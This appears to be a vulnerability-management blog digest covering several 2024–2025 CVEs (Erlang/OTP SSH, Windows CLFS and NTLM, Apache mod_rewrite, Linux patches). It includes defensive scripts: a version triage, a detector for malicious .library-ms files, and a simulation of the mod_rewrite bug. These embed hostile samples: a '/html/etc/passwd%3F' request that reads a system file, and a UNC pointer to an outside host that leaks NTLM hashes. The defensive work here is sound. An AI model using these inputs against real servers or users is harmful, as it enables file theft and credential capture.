About Remote Code Execution – Erlang/OTP (CVE-2025-32433) vulnerability


About Remote Code Execution – Erlang/OTP (CVE-2025-32433) vulnerability. Erlang is a programming language used to build massively scalable, soft real-time systems with high-availability requirements; it is used in telecom, banking, e-commerce, telephony and messaging. OTP is a set of Erlang libraries and design principles that provides the middleware for developing such systems.

A message-handling vulnerability in the Erlang/OTP SSH server allows an unauthenticated attacker with network access to the service to execute arbitrary code. The code runs in the context of the SSH daemon; if the daemon runs as root, this gives full control over the device.

🔻 The vendor bulletin was released on April 16. Updated versions: OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.

🔻 On April 17, a write-up and a PoC exploit (developed using AI) appeared on the Platform Security blog.

🔻 Cisco devices are affected – and likely not the only ones. 😏

👾 No signs of exploitation in the wild so far.
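A quick triage script for the fixed versions named in the bulletin above. This is an added example written for this post, not code from the OTP project: it parses the full OTP_VERSION string (the one-liner asks a local erl for it, since erlang:system_info(otp_release) only returns the major number) and compares it branch by branch against OTP-27.3.3, OTP-26.2.5.11 and OTP-25.3.2.20. Two assumptions are made and marked in the code: branches older than 25 have no fix listed, so they count as unpatched, and branches newer than 27 postdate the bulletin, so they count as fixed. The version strings in the sample are constructed. Remember that only hosts that actually run the ssh application's daemon expose the vulnerable code path; the version check tells you whether the code is there, not whether it is listening.

```python
"""Triage an Erlang/OTP install against the CVE-2025-32433 fixed versions.

Added example, not from the post or from the OTP project. The fixed versions
are the three named in the vendor bulletin. Assumptions (marked below):
branches older than 25 are treated as unpatched because no fix is listed for
them; branches newer than 27 are treated as fixed because they postdate the
bulletin.
"""
import re
import subprocess

FIXED_BY_BRANCH = {
    27: (27, 3, 3),
    26: (26, 2, 5, 11),
    25: (25, 3, 2, 20),
}

# Erlang one-liner that prints the full OTP_VERSION string of the running
# install; erlang:system_info(otp_release) alone gives only "27".
ERL_PRINT_VERSION = (
    '{ok,V}=file:read_file(filename:join([code:root_dir(),"releases",'
    'erlang:system_info(otp_release),"OTP_VERSION"])),'
    'io:format("~s",[V]),halt().'
)


def parse_version(text):
    """'OTP-26.2.5.10' or '26.2.5.10\\n' -> (26, 2, 5, 10)."""
    m = re.search(r"\d+(?:\.\d+)+", text)
    if not m:
        raise ValueError(f"no OTP version found in {text!r}")
    return tuple(int(part) for part in m.group(0).split("."))


def is_fixed(version_text):
    """True if the version carries the CVE-2025-32433 fix for its branch."""
    version = parse_version(version_text)
    branch = version[0]
    if branch in FIXED_BY_BRANCH:
        # Tuple comparison handles the 4-part patch numbers: (26,2,5) < (26,2,5,11)
        return version >= FIXED_BY_BRANCH[branch]
    # Assumption: branches newer than the newest listed one postdate the
    # bulletin and include the fix; older ones have no fix listed.
    return branch > max(FIXED_BY_BRANCH)


def installed_otp_version(erl="erl"):
    """Ask a local erl binary for its OTP_VERSION (e.g. '26.2.5.10')."""
    out = subprocess.run(
        [erl, "-noshell", "-eval", ERL_PRINT_VERSION],
        capture_output=True, text=True, check=True,
    )
    return out.stdout.strip()


def triage(version_texts):
    """Map each version string to 'fixed' or 'VULNERABLE'."""
    return {v: ("fixed" if is_fixed(v) else "VULNERABLE") for v in version_texts}


if __name__ == "__main__":
    # Constructed sample; replace with installed_otp_version() on a real host.
    sample = ["OTP-27.3.2", "OTP-27.3.3", "26.2.5.10", "26.2.5.11", "25.3.2.20", "24.3.4.17"]
    for version, status in triage(sample).items():
        print(f"{version:14} {status}")
```

On a host, run it against installed_otp_version(); on a fleet, feed it whatever your inventory tool reports as the OTP version and treat anything it cannot parse as a host that needs a manual look.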

In Russian

About Elevation of Privilege – Windows Common Log File System Driver (CVE-2025-29824) vulnerability


About Elevation of Privilege – Windows Common Log File System Driver (CVE-2025-29824) vulnerability. The vulnerability from the April Microsoft Patch Tuesday allows an attacker operating under a regular user account to escalate their privileges to SYSTEM level.

🔻 According to Microsoft, the vulnerability was exploited in attacks against organizations in the U.S., Venezuela, Spain, and Saudi Arabia. The exploit was embedded in the PipeMagic malware used by the Storm-2460 group to deploy ransomware.

🔻 On May 7, Symantec reported technical details about another exploit for the vulnerability, used by Balloonfly group (associated with the Play ransomware) in an attack on a U.S. organization prior to April 8.

👾 Are there public exploits? According to BDU FSTEC — yes. NVD also lists “exploit links”, but they point to detection and mitigation scripts. 🤷‍♂️ No mentions yet in exploit packs or on GitHub.

In Russian

About Spoofing – Windows NTLM (CVE-2025-24054) vulnerability


About Spoofing – Windows NTLM (CVE-2025-24054) vulnerability. It was patched in the March Microsoft Patch Tuesday. VM vendors didn't mention this vulnerability in their reviews; all that was known was that exploitation requires the user to interact with a malicious file.

A month later, on April 16, Check Point published a blog post with technical details, revealing that the vulnerability is exploited using specially crafted files…

✋ Wait a minute — there was a trending vulnerability in March MSPT: CVE-2025-24071, related to the same files. 🤔 Turns out, it’s THE SAME vulnerability. 🤪 Check Point reports: “Microsoft had initially assigned the vulnerability the CVE identifier CVE-2025-24071, but it has since been updated to CVE-2025-24054“. What a mess. 🤷‍♂️ Technical details in the previous post.

👾 Since March 19, Check Point has tracked about 11 campaigns exploiting this vulnerability to collect NTLMv2-SSP hashes.
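A small detection helper for the file type behind these campaigns. This is an added example written for this post, not Check Point's or Microsoft's code. It assumes the file shape described in Check Point's analysis: a Windows Library file (.library-ms, an XML document) whose simpleLocation/url names an SMB share on an attacker host, so that merely browsing the extracted file makes Explorer authenticate to that host with NTLM and leak the NTLMv2-SSP hash. The scanner walks a ZIP, parses every .library-ms member and flags UNC targets outside an allowlist of your own file servers. The archive contents are constructed here; 203.0.113.10 is a documentation address.

```python
"""Flag .library-ms files inside ZIP archives that point at a foreign SMB share.

Added example, not from the post or from Check Point. Assumes the file shape
described in Check Point's analysis: a .library-ms XML document whose
<simpleLocation><url> is a UNC path to an attacker-controlled host. Sample
archive contents are constructed below.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"
# \\host\share...  or  \\host  -> host  (either separator style)
UNC_RE = re.compile(r"^\\\\([^\\/]+)(?:[\\/]|$)")


def library_urls(xml_bytes):
    """Text of every <url> element. Matches on the local tag name, so a
    stripped or altered namespace is not enough to hide a location."""
    root = ET.fromstring(xml_bytes)
    urls = []
    for element in root.iter():
        local_name = element.tag.rsplit("}", 1)[-1]
        if local_name == "url" and element.text:
            urls.append(element.text.strip())
    return urls


def unc_host(target):
    r"""'\\host\share' -> 'host' (lower-cased); local paths -> None."""
    m = UNC_RE.match(target)
    return m.group(1).lower() if m else None


def scan_library_ms(name, data, trusted_hosts):
    """One finding per location that points at a host outside trusted_hosts."""
    try:
        urls = library_urls(data)
    except ET.ParseError:
        return [(name, "unparseable .library-ms", None)]
    findings = []
    for url in urls:
        host = unc_host(url)
        if host is not None and host not in trusted_hosts:
            findings.append((name, "UNC location outside trusted hosts", url))
    return findings


def scan_zip(zip_bytes, trusted_hosts=frozenset()):
    """Scan every .library-ms member of a ZIP given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".library-ms"):
                findings.extend(scan_library_ms(info.filename, zf.read(info), trusted_hosts))
    return findings


def library_ms(url):
    """Minimal .library-ms body around one location (constructed test data)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<libraryDescription xmlns="{LIBRARY_NS}">\n'
        '  <searchConnectorDescriptionList>\n'
        '    <searchConnectorDescription>\n'
        f'      <simpleLocation><url>{url}</url></simpleLocation>\n'
        '    </searchConnectorDescription>\n'
        '  </searchConnectorDescriptionList>\n'
        '</libraryDescription>\n'
    ).encode()


def build_sample_zip():
    """Constructed archive: one malicious library, one pointing at an internal
    file server, one pointing at a local folder, and an unrelated document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.library-ms", library_ms(r"\\203.0.113.10\share"))
        zf.writestr("Shared Docs.library-ms", library_ms(r"\\fileserver.corp.example\docs"))
        zf.writestr("Pictures.library-ms", library_ms(r"C:\Users\Public\Pictures"))
        zf.writestr("readme.txt", "nothing to see here")
    return buf.getvalue()


if __name__ == "__main__":
    trusted = frozenset({"fileserver.corp.example"})
    for name, reason, url in scan_zip(build_sample_zip(), trusted):
        print(f"{name}: {reason}: {url}")
```

The allowlist is the important knob: a library pointing at your own file server is normal, one pointing at a bare internet IP is not. Pair the file check with the network-side control that stops the whole class, blocking outbound SMB (TCP 445) to the internet at the perimeter, and use defusedxml instead of the stdlib parser if you run this at scale on untrusted input.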

In Russian

About Remote Code Execution & Arbitrary File Reading – Apache HTTP Server (CVE-2024-38475) vulnerability


About Remote Code Execution & Arbitrary File Reading – Apache HTTP Server (CVE-2024-38475) vulnerability. Improper escaping of output in the mod_rewrite module leads to remote code execution or arbitrary file reading. Successful exploitation does not require authentication.

🔻 Apache HTTP Server 2.4.60, which includes a fix for this vulnerability, was released on July 1, 2024. Orange Tsai (DEVCORE) published technical details and BH2024 slides on the vulnerability on August 9, 2024. A PoC exploit has been on GitHub since August 18, 2024.

🔻 On April 29, 2025, it was disclosed that CVE-2024-38475 is being actively exploited to compromise SonicWall SMA gateways. watchTowr Labs explains how the vulnerability exposes the SQLite file containing active session tokens. On May 1, the vulnerability was added to the CISA KEV.

Naturally, this vulnerability could potentially affect far more than just SonicWall appliances. 😏
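To make the "improper escaping" concrete, here is a simulation of the mod_rewrite mechanism from the DEVCORE write-up. It is an added example written for this post, not Apache code: it models a server-context RewriteRule whose substitution begins with a backreference, a request in which %3F is percent-decoded to a question mark before the rule runs, and the pre-2.4.60 behaviour of letting that decoded question mark split the substitution into a filename and a query string, so the suffix the admin appended falls off and the backreference alone decides the file. It also models the second half of the trick: in server context a result whose first segment names an existing directory is treated as a filesystem path rather than a URL under DocumentRoot. The patched branch refuses such a request unless the rule opts back in with the UnsafeAllow3F flag; that flag and the refusal come from the 2.4.60 release notes and mod_rewrite documentation, not from this post, and Apache's exact status code and log line are not reproduced. The rule, the directory list and the requests are constructed for the demo.

```python
"""Simulation of the mod_rewrite behaviour behind CVE-2024-38475.

Added example for this post, not Apache code. Models: percent-decoding before
the rule matches, a substitution that starts with a backreference, the
pre-2.4.60 habit of letting a decoded '?' cut the result into filename and
query string, and the server-context rule that a result whose first segment
is an existing directory is a filesystem path. Everything below is constructed.
"""
import re
from urllib.parse import unquote

# Constructed server: top-level directories that exist on disk, and DocumentRoot.
EXISTING_TOP_DIRS = {"usr", "etc", "var"}
DOCUMENT_ROOT = "/var/www/html"

# RewriteRule ^/html/(.*)$ /$1.html   (server context; substitution begins with $1)
RULE_PATTERN = re.compile(r"^/html/(.*)$")
RULE_SUBST = "/$1.html"


def apply_rule(request_target, *, patched, unsafe_allow_3f=False):
    """Return where a request ends up after the rule.

    patched=False  models 2.4.59 and earlier.
    patched=True   models 2.4.60+: a decoded '?' arriving through a
                   backreference makes the server refuse the request unless
                   the rule carries the UnsafeAllow3F flag (status code and
                   log message of the real server are not modelled).
    """
    # A literal '?' in the request line already split off the real query string.
    raw_path = request_target.partition("?")[0]
    # Percent-decoding happens before mod_rewrite matches, so %3F is '?' here.
    decoded = unquote(raw_path)
    m = RULE_PATTERN.match(decoded)
    if not m:
        return {"outcome": "no-match", "path": decoded}
    groups = m.groups()
    if patched and not unsafe_allow_3f and any("?" in g for g in groups):
        return {"outcome": "rejected", "reason": "backreference carries a decoded '?'"}
    expanded = re.sub(r"\$(\d)", lambda mm: groups[int(mm.group(1)) - 1], RULE_SUBST)
    # Unpatched (or UnsafeAllow3F): the '?' from the request is not re-escaped,
    # so everything after it, here the '.html' suffix, becomes the query string.
    filename, _, query = expanded.partition("?")
    first_segment = filename.lstrip("/").split("/", 1)[0]
    if first_segment in EXISTING_TOP_DIRS:
        # Server context: first segment is a real directory -> filesystem path.
        return {"outcome": "filesystem", "filename": filename, "query": query}
    return {"outcome": "docroot", "filename": DOCUMENT_ROOT + filename, "query": query}


if __name__ == "__main__":
    for target in ("/html/index", "/html/etc/passwd%3F"):
        for patched in (False, True):
            result = apply_rule(target, patched=patched)
            print(f"{target:22} patched={patched!s:5} -> {result}")
```

The benign request /html/index lands under DocumentRoot in both modes. The request /html/etc/passwd%3F is served straight from /etc/passwd on the unpatched model and rejected on the patched one, which is the same shape as the SonicWall case above: a rule meant to map URLs under the web root ends up mapping them onto whatever file the attacker names. When auditing your own configs, the rules to look at are server-context RewriteRules whose substitution starts with a backreference or a variable.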

In Russian

April Linux Patch Wednesday


April Linux Patch Wednesday. Total vulnerabilities: 251. 👌 164 in the Linux Kernel. No vulnerabilities show signs of being exploited in the wild. There are 7 vulnerabilities that appear to have publicly available exploits.

For 2 vulnerabilities, exploit code with a detailed explanation is available on GitHub. Both were first patched in RedOS packages:

🔸 SQL injection – Exim (CVE-2025-26794)
🔸 Code Injection – MariaDB (CVE-2023-39593)

For the Memory Corruption – Mozilla Firefox (CVE-2025-3028), the NVD states the exploit code is in Mozilla’s bug tracker, but access is restricted. 🤷‍♂️

BDU FSTEC reports public exploits for 4 vulnerabilities:

🔸 Information Disclosure – GLPI (CVE-2025-21626)
🔸 Security Feature Bypass – GLPI (CVE-2025-23024)
🔸 Denial of Service / Remote Code Execution – Perl (CVE-2024-56406)
🔸 Memory Corruption – Libsoup (CVE-2025-32050)

🗒 Full Vulristics report

In Russian

About Elevation of Privilege – Windows Process Activation (CVE-2025-21204) vulnerability


About Elevation of Privilege – Windows Process Activation (CVE-2025-21204) vulnerability. This vulnerability from the April Microsoft Patch Tuesday was not highlighted by VM vendors in their reviews. It affects the Windows Update Stack component and is related to improper link resolution before file access (CWE-59).

🔻 On April 14, researcher Elli Shlomo (CYBERDOM) published a write-up and exploit code to gain SYSTEM privileges. On April 27, after reports that the exploit didn’t work, he removed it and promised to revise it. 🤔 Exploitability remains unclear.

🔻 On April 22, researcher Kevin Beaumont reported that the fix for this vulnerability, which involves creating a folder, introduces a new denial-of-service vulnerability: it allows non-admin users to block the installation of Windows security updates. Microsoft responded that they don't plan to fix it promptly. 🤷‍♂️ For now, it's recommended to monitor for malicious activity.

In Russian

April “In the Trend of VM” (#14): vulnerabilities in Microsoft Windows, VMware products, Kubernetes, and Apache Tomcat


April “In the Trend of VM” (#14): vulnerabilities in Microsoft Windows, VMware products, Kubernetes, and Apache Tomcat. We decided to pause recording new videos, so for now only text. 🤷‍♂️🙂

🗞 Post on Habr (rus)
🗒 Digest on the PT website (rus)

A total of 11 trending vulnerabilities:

🔻 Elevation of Privilege – Windows Cloud Files Mini Filter Driver (CVE-2024-30085)
🔻 Spoofing – Windows File Explorer (CVE-2025-24071)
🔻 Four Windows vulnerabilities from March Microsoft Patch Tuesday were exploited in the wild (CVE-2025-24985, CVE-2025-24993, CVE-2025-26633, CVE-2025-24983)
🔻 Three VMware “ESXicape” Vulnerabilities (CVE-2025-22224, CVE-2025-22225, CVE-2025-22226)
🔻 Remote Code Execution – Apache Tomcat (CVE-2025-24813)
🔻 Remote Code Execution – Kubernetes (CVE-2025-1974)

In Russian